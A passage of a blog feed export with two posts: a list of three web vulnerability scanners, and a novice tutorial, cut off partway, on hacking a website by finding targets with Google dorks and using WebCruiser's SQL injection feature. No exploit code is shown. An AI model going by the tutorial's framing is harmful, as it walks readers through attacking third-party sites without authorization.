&lt;div class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot; style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;post-header&quot;&gt;

&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;h2 style=&quot;text-align: center;&quot;&gt;
Top 3 Vulnerability Scanners Tool&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style=&quot;color: purple;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;
Hello Friends&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;b&gt;Web site security is extremely necessary as a result of web site 
contain relevant info a few company and currently a days website 
defacement is extremely common even a script kiddies and a brand new 
born hackers will try this. the foremost common vulnerability like 
SQL-Injection and cross website scripting lead towards the defacement.&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghI2A34OsABHVKTdNk4OPjgddfCA1w5QOfJaTrkuyaC8rhG8P55hqvn55Vmh6wx9Ac_xz1GPgWUKEz7yPNBgP6oeOdX0KAQaG95Jd3Rw0ZmqKSPdcJsXdSNS2HmL7K8jystkdlv7SbYf8/s1600/images.jpg&quot;&gt;&lt;img alt=&quot;Vulnerability-scanning&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghI2A34OsABHVKTdNk4OPjgddfCA1w5QOfJaTrkuyaC8rhG8P55hqvn55Vmh6wx9Ac_xz1GPgWUKEz7yPNBgP6oeOdX0KAQaG95Jd3Rw0ZmqKSPdcJsXdSNS2HmL7K8jystkdlv7SbYf8/s1600/images.jpg&quot; title=&quot;Vulnerability-scanning&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;So you wish to secure your net application than realize 
vulnerabilities thereon before a hacker realize it, try and use some 
relevant tools and realize vulnerabilities and fix it. There area unit 
such a big amount of tools offered for each Windows and Linux platform 
and business and open source tool. Below is that the best internet 
vulnerability scanner tool that we&#39;ve mentioned before.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;
&lt;a href=&quot;http://www.arachni-scanner.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Arachni&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Free, Open Source, Simple, Distributed, Intelligent, Powerful, 
Friendly. Arachni is an Open Source, feature-full, modular, 
high-performance Ruby framework aimed towards helping penetration 
testers and administrators evaluate the security of web applications.&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;It is smart, it trains itself by learning from the HTTP responses it 
receives during the audit process and is able to perform meta-analysis 
using a number of factors in order to correctly assess the 
trustworthiness of results and intelligently identify false-positives.&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHPM41fUFvsCqe06GaY1MiGcOKA6pAWTMvEM1hOFyUfdX0HNrKs8GHMpPlaoZqSx6YDA_HeIOSdivEuxJZKNZUmL7tXZy4f_FRa6Iwc9mLT9mnw9EpxRrdsvi1DFFKbiqiWGt9OU6RQgs/s1600/slider_scans_show_charts.png&quot;&gt;&lt;img alt=&quot;arachni-scanner&quot; border=&quot;0&quot; height=&quot;157&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHPM41fUFvsCqe06GaY1MiGcOKA6pAWTMvEM1hOFyUfdX0HNrKs8GHMpPlaoZqSx6YDA_HeIOSdivEuxJZKNZUmL7tXZy4f_FRa6Iwc9mLT9mnw9EpxRrdsvi1DFFKbiqiWGt9OU6RQgs/s280/slider_scans_show_charts.png&quot; title=&quot;arachni-scanner&quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;It is versatile enough to cover a great deal of use cases, ranging 
from a simple command line scanner utility, to a global high performance
 grid of scanners, to a Ruby library allowing for scripted audits, to a 
multi-user multi-scan web collaboration platform.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href=&quot;http://www.acunetix.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Acunetix&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Acunetix has pioneered the web application security scanning 
technology: Its engineers have focused on web security as early as 1997 
and developed an engineering lead in web site analysis and vulnerability
 detection&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQP361rns0WEDr8o67Vkyp657mUG0Ju7dOZ4HlbxNwI6P5vePvvkBqdxDzAOi67XZp7SLkF3JhI4xvqEeGA3fAETD3o6-DJtmWxsi1tlmRnO9Ggk2vYaTctqeQMll9JCsxkjcNOyTWOzU/s1600/acunetix_big.jpg&quot;&gt;&lt;img alt=&quot;acunetix-scanner&quot; border=&quot;0&quot; height=&quot;203&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQP361rns0WEDr8o67Vkyp657mUG0Ju7dOZ4HlbxNwI6P5vePvvkBqdxDzAOi67XZp7SLkF3JhI4xvqEeGA3fAETD3o6-DJtmWxsi1tlmRnO9Ggk2vYaTctqeQMll9JCsxkjcNOyTWOzU/s280/acunetix_big.jpg&quot; title=&quot;acunetix-scanner&quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;As many as 70% of websites have vulnerabilities which could be exploited by&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;hackers or rogue insiders, leading to theft of sensitive corporate data such as&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;credit card information and customer lists.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Hackers concentrate their efforts on web-based applications such as&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;shopping carts, forms, login pages, dynamic content and plain-and-simple&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;human error. Accessible 24/7 from anywhere in the world, insecure web&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;applications provide easy access to backed corporate databases and allow&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;hackers to perform illegal activities using the compromised site.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href=&quot;https://www.mavitunasecurity.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Netsparker&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Netsparker is the only False-positive-free web application security 
scanner. Simply point it at your website and it will automatically 
discover the flaws that could leave you dangerously exposed.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidkp4nndJEvgQNZh1Kmykt-SalZtPu8Cfi-AMEdOfJyINTiFEc9CWk3nJgVVrfi3ldgH0ukunATIV8PXnKWLnxrAw_G6xHcFlgs2VXojPlzMJpdEcc6b111-Hbnxb4SyLV5C3REXkwrVc/s1600/largeImg.png&quot;&gt;&lt;img alt=&quot;nesparker-scanner&quot; border=&quot;0&quot; height=&quot;191&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidkp4nndJEvgQNZh1Kmykt-SalZtPu8Cfi-AMEdOfJyINTiFEc9CWk3nJgVVrfi3ldgH0ukunATIV8PXnKWLnxrAw_G6xHcFlgs2VXojPlzMJpdEcc6b111-Hbnxb4SyLV5C3REXkwrVc/s280/largeImg.png&quot; title=&quot;nesparker-scanner&quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/8180105095055650144/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/how-to-chack-any-wbesite-vulnerability.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/8180105095055650144'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/8180105095055650144'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/how-to-chack-any-wbesite-vulnerability.html' title='How To Chack Any Wbesite Vulnerability - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghI2A34OsABHVKTdNk4OPjgddfCA1w5QOfJaTrkuyaC8rhG8P55hqvn55Vmh6wx9Ac_xz1GPgWUKEz7yPNBgP6oeOdX0KAQaG95Jd3Rw0ZmqKSPdcJsXdSNS2HmL7K8jystkdlv7SbYf8/s72-c/images.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-984579786275106571</id><published>2014-03-17T18:50:00.000+05:00</published><updated>2014-03-17T18:50:34.797+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Website Hacking"/><title type='text'>How To Hack A Website With WebCruiser Scanner - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: orange;&quot;&gt;Hello Friends&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; How To Hack A Website With WebCruiser Scanner &lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;[&lt;span style=&quot;color: red;&quot;&gt;*&lt;/span&gt;]&lt;span style=&quot;color: red;&quot;&gt;Introduction&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
Welcome to my step by step tutorial on how to hack a website using &lt;span style=&quot;color: red;&quot;&gt;WebCruiser Scanner&lt;/span&gt;.&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
As always I will try to explain it in the easiest way so it will be n00b friendly.&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
I suggest you to practice &quot;hacking&quot; manually as using tools wont make your skills go higher. &lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
Whatsoever there are lazy-ass guys :P who find it better to perform these attacks by tools.&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
Ok , first of all we need to download &lt;span style=&quot;color: red;&quot;&gt;WebCruiser Scanner&lt;/span&gt;.&lt;/span&gt;&lt;/i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;a href=&quot;http://sec4app.com/download/WebCruiserEnt.zip&quot; target=&quot;_blank&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Download From Here !&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;_____________________________&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;[&lt;span style=&quot;color: red;&quot;&gt;*&lt;/span&gt;] &lt;span style=&quot;color: red;&quot;&gt;Let&#39;s start:&lt;/span&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
You will need a target , you can use google dorks to find vulnerable websites.&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
I won&#39;t bother on that part as there are billions of google dorks out there.&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&amp;nbsp;
OK, I found my vulnerable website:&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;br /&gt;
&lt;div class=&quot;codeblock&quot;&gt;
&lt;div class=&quot;title&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Code:&lt;/span&gt;&lt;/i&gt;
&lt;/div&gt;
&lt;div class=&quot;body&quot; dir=&quot;ltr&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;code&gt;http://www.target.com/vmarket.php?id=17&lt;/code&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
Let&#39;s open WebCruiser Scanner and check the target for vulnerabilities like on the picture below:&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar1&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: center; width: 582px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: #cccccc;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Hacking Tools And Hacking Tutorials&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div id=&quot;fop_img1&quot; style=&quot;cursor: pointer; margin: 0px auto; width: 605px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; border=&quot;0&quot; height=&quot;472&quot; src=&quot;http://img819.imageshack.us/img819/9458/6yqz.png&quot; style=&quot;width: 605px;&quot; title=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
Then click &lt;span style=&quot;color: red;&quot;&gt;Scan Site&lt;/span&gt;.&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar2&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: left; width: 582px;&quot;&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar1&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: center; width: 582px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: #cccccc;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Hacking Tools And Hacking Tutorials&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;fop_img2&quot; style=&quot;cursor: pointer; margin: 0px auto; width: 605px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; border=&quot;0&quot; height=&quot;470&quot; src=&quot;http://img15.imageshack.us/img15/1069/uiba.png&quot; style=&quot;width: 605px;&quot; title=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
Now we will wait a minute or two , depends on you internet connection 
speed for the scan to finish , then we will see the results like the 
image below.&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;div id=&quot;fop_img3&quot; style=&quot;cursor: pointer; margin: 0px auto; width: 605px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; border=&quot;0&quot; height=&quot;472&quot; src=&quot;http://img96.imageshack.us/img96/4141/6f7u.png&quot; style=&quot;width: 605px;&quot; title=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
As we can see the website is vulnerable to &lt;span style=&quot;color: red;&quot;&gt;Sql injection&lt;/span&gt; &amp;amp; &lt;span style=&quot;color: red;&quot;&gt;XSS&lt;/span&gt;. &lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
We will perform a &lt;span style=&quot;color: red;&quot;&gt;SQL injection&lt;/span&gt; this time.&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;[&lt;span style=&quot;color: red;&quot;&gt;*&lt;/span&gt;] &lt;span style=&quot;color: red;&quot;&gt;Attack&lt;/span&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;Right click&lt;/span&gt; on the vulnerable url and then &lt;span style=&quot;color: red;&quot;&gt;SQL INJECTION POC&lt;/span&gt; , now you&lt;br /&gt;
just need to follow the steps below.&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
I have explained step by step with pictures so it will be easier for you to understand.&lt;/span&gt;&lt;/i&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar4&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: left; width: 582px;&quot;&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar9&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: center; width: 582px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: #cccccc;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Hacking Tools And Hacking Tutorials&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;fop_img4&quot; style=&quot;cursor: pointer; margin: 0px auto; width: 605px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; border=&quot;0&quot; height=&quot;473&quot; src=&quot;http://i.imgur.com/tIYUXPt.png&quot; style=&quot;width: 605px;&quot; title=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar5&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: left; width: 582px;&quot;&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar9&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: center; width: 582px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: #cccccc;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Hacking Tools And Hacking Tutorials&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;fop_img5&quot; style=&quot;cursor: pointer; margin: 0px auto; width: 605px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; border=&quot;0&quot; height=&quot;472&quot; src=&quot;http://i.imgur.com/Zz3KsjE.png&quot; style=&quot;width: 605px;&quot; title=&quot;How To Hack A Website With WebCruiser Scanner - FOCSoft&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar6&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: left; width: 582px;&quot;&gt;
&lt;div class=&quot;smalltext&quot; id=&quot;fop_topbar9&quot; style=&quot;background: url(&amp;quot;&amp;quot;) no-repeat scroll left center rgb(26, 26, 26); cursor: pointer; margin: 0px auto; padding: 3px 3px 3px 20px; text-align: center; width: 582px;&quot;&gt;
&lt;i&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: #cccccc;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Hacking Tools And Hacking Tutorials&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;fop_img6&quot; style=&quot;cursor: pointer; margin: 0px auto; width: 605px;&quot;&gt;
